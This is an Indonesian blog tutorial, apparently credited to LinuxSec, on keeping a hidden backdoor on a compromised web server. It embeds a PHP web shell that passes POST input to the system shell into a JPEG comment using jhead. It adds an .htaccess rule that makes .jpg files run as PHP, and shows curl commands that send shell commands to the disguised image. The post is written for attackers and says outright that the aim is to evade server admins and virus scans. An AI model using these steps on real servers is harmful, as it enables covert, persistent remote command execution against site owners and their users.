Ada banyak cara yang bisa dilakukan untuk membuat file backdoor atau
akses pintu belakang yang kita buat di server target tetap awet alias
tidak ketauan dan diterminate oleh admin webnya. Mulai dari menyisipkan
file hidden uploader ke file yang sudah ada dll. Namun tentu saja trik
tersebut masih ada kekurangan karena file tetap akan dianggap virus
ketika server di scan.
Nah kali ini kita akan membahas cara menyisipkan file
backdoor php ke file gambar. Dan tentu saja ini bisa kita lakukan
dengan cara mendownload file yang ada di server, modifikasi data, upload
kemabali. Dengan ini kemungkinan backdoor kita ditemukan mengecil (
kecuali webmasternya kelewat pro ) .
Nah seperti yang terlihat diatas, file tersebut saat diakses langsung
akan terlihat seperti gambar normal pada umumnya, namun tentu file
tersebut lebih istimewa bagi attacker yang menyisipkan backdoor ke file
tersebut :D .
Untuk menyisipkan file backdoor ke file gambar seperti itu, kita bisa menggunakan Jhead. Gunakan Linux :p
install dengan command :
sudo apt-get install jhead
Selanjutnya kita siapkan file gambar yang akan kita sisipi backdoor.
Untuk tutorial kali ini saya menggunakan file gambar asuna.jpg yang saya simpan di ~/Desktop/bd/
Pertama, kita murnikan file gambar tadi dengan command
jhead -purejpg asuna.jpg
Ini untuk menghapus comment ataupun script yang mungkin disisipkan sebelumnya.
lalu masukkan command :
jhead -ce asuna.jpg
Selanjutnya kita masukkan script berikut ke dalam gambar :
<?php passthru($_POST['cmd']); __halt_compiler();
basic vim diperlukan karena yang digunakan adalah vim editor :p
Setelah disave, harusnya script tadi sudah nyempil di comment.
Lalu kita upload gambar yang disipi backdoor tadi ke server target.
Jangan lupa di direktori yang sama tambahkan .htaccess dengan isi :
AddType application/x-httpd-php .jpg
Ini ditujukan agar sript php didalamnya tetap terbaca meski ekstensi file nya bukan php.
Nah, cara mengakses backdoor nya :
curl -d cmd="command disini" webtarget/gambar.jpg
Contoh :
curl -d cmd="uname -a; whoami; id" http://localhost/gambar/asuna.jpg
menarik bukan ?
Sekian dan Terimakasih
Source & Thanks : LinuxSec
No comments:
Post a Comment